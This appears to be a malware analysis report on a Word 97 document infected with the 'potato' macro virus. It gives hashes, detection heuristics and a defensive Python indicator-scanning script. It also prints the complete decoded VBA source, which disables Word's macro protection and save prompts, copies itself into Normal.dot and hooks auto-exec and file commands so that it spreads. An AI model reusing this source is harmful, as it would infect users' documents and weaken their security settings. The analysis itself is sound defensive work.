Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9fe908e83331c01a…

MALICIOUS

Office (OLE)

Size: 41.5 KB | Created: 1999-11-19 14:12:00 | Authoring application: Microsoft Word 8.0 | First seen: 2012-06-14
MD5: 21297ac61c2a952afebfb9ec8da451f2 | SHA-1: 10109684e2a2e2d0f83bb3ae3a0ac81ff1fe73ac | SHA-256: 9fe908e83331c01af1e75869592c41ed61c4d2c3e59bb742c76685adfa06a6e3
Risk score: 240

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a legacy Word 8.0 (Word 97) document whose VBA project holds a module named 'potato'. Its one real routine, potato(), is a classic global-template infector rather than a dropper: it clears Options.VirusProtection, ConfirmConversions and SaveNormalPrompt so Word neither warns about macros nor prompts before saving Normal.dot, checks whether the running code lives in the global template (MacroContainer = NormalTemplate), and then calls Application.OrganizerCopy with wdOrganizerObjectProjectItems to copy the 'potato' module in whichever direction is needed: from an infected document into Normal.dot, or from an infected Normal.dot into the active document, which is then saved as a .doc (wdFormatDocument). Every entry point in the module calls potato(): the auto-executing macros AutoOpen, AutoClose and AutoExit, plus same-named overrides of the built-in Word commands FileNew, FileSave, FileSaveAs, FileClose, FileExit and ToolsOptions, so once Normal.dot is infected any document that is opened, saved or closed picks up the module (the Skip flag only stops FileNew from saving the document a second time). The only other routine, green(), is entirely commented out and would have written nothing more than a batch file that echoes text; nothing is downloaded or dropped. ClamAV's Doc.Trojan.VMPCK1-2 signature matches the extracted macro source.
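To make the infection logic described above checkable rather than read by eye, here is an added triage script. It is this page's added example, not code from the report, from oletools or from the sample: it scans decoded VBA source for the indicator classes this sample exhibits (auto-executing entry points, overrides of built-in Word command names, security-setting tampering, global-template infection via OrganizerCopy, error suppression), maps each entry point to the routine it calls, and returns a verdict. The embedded input is a condensed copy of the potato module from the extracted macros.bas; the category names, weights and verdict rule are this example's own choices, and in practice the input would be olevba's decoded output.

```python
"""Indicator scan for Word macro-virus behaviour in decoded VBA source.
Added example: the categories, weights and verdict rule are its own choices."""
import re
from collections import defaultdict

# Condensed copy of the decoded 'potato' module from the extracted macros.bas
# on this page: entry points trimmed to three, infector logic unchanged.
SAMPLE_VBA = '''\
Sub potato()
On Error Resume Next
With Options
    .VirusProtection = (rnd * 0)
    .ConfirmConversions = (rnd * 0)
    .SaveNormalPrompt = (rnd * 0)
End With
Set targetrabbitobject = MacroContainer
If targetrabbitobject = NormalTemplate Then bluerabbitobject = 1
If bluerabbitobject = 1 Then yellowrabbitobject = NormalTemplate.FullName Else yellowrabbitobject = ActiveDocument.FullName
Application.OrganizerCopy Source:=yellowrabbitobject, Destination:=pinkrabbitobject, Name:="potato", Object:=wdOrganizerObjectProjectItems
If NormalTemplate.Saved = False Then NormalTemplate.Save
End Sub
Sub FileSave()
    On Error Resume Next
    Call potato
    ActiveDocument.Save
End Sub
Sub AutoOpen()
    Call potato
End Sub
Sub AutoClose()
    Call potato
End Sub
'''
SUB_DEF = re.compile(r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\s*\(', re.I)
SUB_END = re.compile(r'^\s*End\s+(?:Sub|Function)\b', re.I)
CALL = re.compile(r'^\s*Call\s+(\w+)', re.I)
# Macro names Word runs automatically on document events.
AUTOEXEC = {"autoopen", "autoclose", "autoexec", "autoexit", "autonew",
            "document_open", "document_close", "document_new"}
# A macro named after a built-in Word command replaces that command.
BUILTIN_OVERRIDE = {"filenew", "filesave", "filesaveas", "fileclose", "fileexit",
                    "toolsoptions", "toolsmacro", "fileprint", "viewvbcode"}
INDICATORS = {
    "security_disable": re.compile(
        r'\.(VirusProtection|SaveNormalPrompt|ConfirmConversions)\s*=', re.I),
    "template_infect": re.compile(
        r'OrganizerCopy|wdOrganizerObjectProjectItems|MacroContainer'
        r'|NormalTemplate\.(Save|FullName)\b', re.I),
    "error_suppress": re.compile(r'On\s+Error\s+Resume\s+Next', re.I),
}
WEIGHTS = {"autoexec": 3, "builtin_override": 2, "security_disable": 4,
           "template_infect": 5, "error_suppress": 1}  # example's own weights


def scan(vba):
    """Return {category: [(line_no, matched_text), ...]} over the source."""
    hits = defaultdict(list)
    for no, line in enumerate(vba.splitlines(), 1):
        m = SUB_DEF.match(line)
        if m:
            name = m.group(1)
            if name.lower() in AUTOEXEC:
                hits["autoexec"].append((no, name))
            elif name.lower() in BUILTIN_OVERRIDE:
                hits["builtin_override"].append((no, name))
        for cat, rx in INDICATORS.items():
            for hit in rx.finditer(line):
                hits[cat].append((no, hit.group(0)))
    return dict(hits)


def entry_points(vba):
    """Map each auto-exec or command-override Sub to the Subs it Calls."""
    subs, current = {}, None
    for line in vba.splitlines():
        m = SUB_DEF.match(line)
        if m:
            current = m.group(1)
            subs[current] = set()
        elif SUB_END.match(line):
            current = None
        elif current is not None and CALL.match(line):
            subs[current].add(CALL.match(line).group(1))
    return {name: sorted(calls) for name, calls in subs.items()
            if name.lower() in AUTOEXEC | BUILTIN_OVERRIDE}


def score(hits):
    return sum(WEIGHTS[cat] * len(found) for cat, found in hits.items())


def classify(hits):
    """Self-replication needs an entry point plus template-infection code."""
    if hits.get("autoexec") and hits.get("template_infect"):
        return "macro virus: self-replicating via the global template"
    if hits.get("autoexec") or hits.get("builtin_override"):
        return "auto-executing macro, no replication code seen"
    return "no auto-exec indicators"


if __name__ == "__main__":
    found = scan(SAMPLE_VBA)
    print(classify(found), "score", score(found), entry_points(SAMPLE_VBA))
```

Running it on the embedded sample reports every entry point (FileSave, AutoOpen, AutoClose) calling potato, three security-setting writes, five template-infection hits and the "macro virus" verdict; the verdict rule deliberately requires both an entry point and template-infection code, since an AutoOpen alone is common in benign legacy documents.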

Heuristics 5

  • ClamAV: Doc.Trojan.VMPCK1-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.VMPCK1-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • AutoClose macro high OLE_VBA_AUTOCLOSE
    AutoClose macro (the heuristic label reads Auto_Close; the sub in this sample is named AutoClose)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. On its own this is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution. The heuristic's generic wording ('no modern VBA project was recovered') does not hold for this sample: the VBA project was extracted in full as macros.bas (see Extracted artifacts), and the AutoOpen, AutoClose and AutoExit names the marker keys on are visible in that source.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2607 bytes
SHA-256: dc7b9367de596fceb0ef3ca4944ddcf836860ac0aabbb86c4f3e40a99c84db76
Detection
ClamAV: Doc.Trojan.VMPCK1-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "potato"

Public Skip As Integer
    
Sub potato()
    
On Error Resume Next
With Options
    .VirusProtection = (rnd * 0)
    .ConfirmConversions = (rnd * 0)
    .SaveNormalPrompt = (rnd * 0)
End With

ActiveDocument.ReadOnlyRecommended = False
bluerabbitobject = 0
Set targetrabbitobject = MacroContainer
'whiterabbitobject = GetAttr(NormalTemplate.FullName)
If targetrabbitobject = NormalTemplate Then bluerabbitobject = 1
If bluerabbitobject = 1 Then yellowrabbitobject = NormalTemplate.FullName Else yellowrabbitobject = ActiveDocument.FullName
If bluerabbitobject = 1 Then pinkrabbitobject = ActiveDocument.FullName Else pinkrabbitobject = NormalTemplate.FullName
Application.OrganizerCopy Source:=yellowrabbitobject, Destination:=pinkrabbitobject, Name:="potato", Object:=wdOrganizerObjectProjectItems
If bluerabbitobject = 1 And Skip <> 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
If bluerabbitobject = 0 Then
     If NormalTemplate.Saved = False Then NormalTemplate.Save
     End If
fuxors:
End Sub
Sub FileNew()
    On Error Resume Next
    Call potato
Dialogs(wdDialogFileNew).Show
    Skip = 1
    Call potato
End Sub
Sub FileSave()
    On Error Resume Next
    Call potato
    ActiveDocument.Save
End Sub
Sub FileClose()
    On Error Resume Next
    Call potato
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    ActiveDocument.Close
End Sub
Sub ToolsOptions()
    On Error Resume Next
Dialogs(wdDialogToolsOptions).Show
    Call potato
End Sub
Sub FileSaveAs()
    On Error Resume Next
Dialogs(wdDialogFileSaveAs).Show
    Call potato
End Sub
Sub FileExit()
    On Error Resume Next
    Call potato
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    Application.Quit
End Sub
Sub AutoOpen()
    On Error Resume Next
    Call potato
End Sub
Sub AutoExit()
    On Error Resume Next
    Call potato
End Sub
Sub AutoClose()
    On Error Resume Next
    Call potato
End Sub
Sub green(strFile As String)
    
'Dim hFile As Long
'On Error Resume Next
'hFile = FreeFile
'Open strFile For Output Access Write As hFile
'Print #hFile, "@echo off"
'Print #hFile, "@echo 1 Patato 2 patato 3 patato 4"
'Print #hFile, "@echo 5 Patato 6 patato 7 patato more"
'Close hFile
End Sub